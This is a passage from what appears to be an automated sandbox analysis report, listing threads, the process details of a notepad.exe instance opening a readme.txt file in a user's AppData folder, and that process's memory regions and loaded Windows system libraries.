0x8ec Thread: id = 133 os_tid = 0x8c0 Thread: id = 134 os_tid = 0x8bc Thread: id = 135 os_tid = 0x8b8 Thread: id = 136 os_tid = 0x8b4 Thread: id = 137 os_tid = 0x8b0 Thread: id = 138 os_tid = 0x8f0 Thread: id = 140 os_tid = 0x8f8 Thread: id = 141 os_tid = 0x8fc Thread: id = 142 os_tid = 0x900 Thread: id = 143 os_tid = 0x9e8 Thread: id = 144 os_tid = 0x9ec Thread: id = 145 os_tid = 0x9f0 Thread: id = 146 os_tid = 0x9f4 Thread: id = 147 os_tid = 0x9f8 Thread: id = 148 os_tid = 0x9fc Thread: id = 159 os_tid = 0xab0 Process: id = "19" image_name = "notepad.exe" filename = "c:\\windows\\system32\\notepad.exe" page_root = "0x31116000" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xed8" cmd_line = "\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\kEecfMwgj\\AppData\\Roaming\\readme.txt" cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2465 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2466 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2467 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2468 start_va = 0x60000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2469 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2470 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2471 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2472 start_va = 0xff800000 end_va = 0xff834fff monitored = 0 entry_point = 0xff803570 region_type = mapped_file name = "notepad.exe" filename = "\\Windows\\System32\\notepad.exe" (normalized: "c:\\windows\\system32\\notepad.exe") Region: id = 2473 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2474 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2475 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2476 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2477 start_va = 0xe0000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2478 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2479 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2480 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2481 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2482 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2483 start_va = 0xe0000 end_va = 0x146fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2484 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2485 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2486 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2487 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2488 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2489 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2490 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2491 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2492 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2493 start_va = 0x7feff230000 end_va = 0x7feff2c6fff monitored = 0 entry_point = 0x7feff2313e8 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 2495 start_va = 0x7feff2d0000 end_va = 0x7feff340fff monitored = 0 entry_point = 0x7feff2e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2496 start_va = 0x7fefc2b0000 end_va = 0x7fefc4a3fff monitored = 0 entry_point = 0x7fefc43c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2497 start_va = 0x7fefe070000 end_va = 0x7fefedf7fff monitored = 0 entry_point = 0x7fefe0ecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2498 start_va = 0x7fefb890000 end_va = 0x7fefb900fff monitored = 0 entry_point = 0x7fefb8cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 2499 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2500 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2501 start_va = 0x7fefc940000 end_va = 0x7fefc94bfff monitored = 0 entry_point = 0x7fefc941064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2502 start_va = 0x390000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2503 start_va = 0x150000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2504 start_va = 0x250000 end_va = 0x278fff monitored = 0 entry_point = 0x251010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2505 start_va = 0x520000 end_va = 0x6a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2506 start_va = 0x250000 end_va = 0x278fff monitored = 0 entry_point = 0x251010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2507 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2508 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2509 start_va = 0x6b0000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 2510 start_va = 0x840000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2511 start_va = 0x20000 end_va = 0x22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "notepad.exe.mui" filename = "\\Windows\\System32\\en-US\\notepad.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\notepad.exe.mui") Region: id = 2525 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2526 start_va = 0x250000 end_va = 0x250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2527 start_va = 0x260000 end_va = 0x260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2528 start_va = 0x270000 end_va = 0x271fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 2529 start_va = 0x390000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2530 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2531 start_va = 0x390000 end_va = 0x40cfff monitored = 0 entry_point = 0x39cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2532 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2533 start_va = 0x390000 end_va = 0x40cfff monitored = 0 entry_point = 0x39cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2534 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2535 start_va = 0x7fefc0d0000 end_va = 0x7fefc125fff monitored = 0 entry_point = 0x7fefc0dbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2536 start_va = 0x1c40000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2539 start_va = 0x390000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 2540 start_va = 0x7fefbca0000 end_va = 0x7fefbcb7fff monitored = 0 entry_point = 0x7fefbca1130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2541 start_va = 0x1c40000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 2542 start_va = 0x1d20000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 2543 start_va = 0x1da0000 end_va = 0x26cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 2544 start_va = 0x26d0000 end_va = 0x299efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2545 start_va = 0x29a0000 end_va = 0x2a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 2546 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 2551 start_va = 0x280000 end_va = 0x280fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 2552 start_va = 0x280000 end_va = 0x281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Thread: id = 151 os_tid = 0xa0c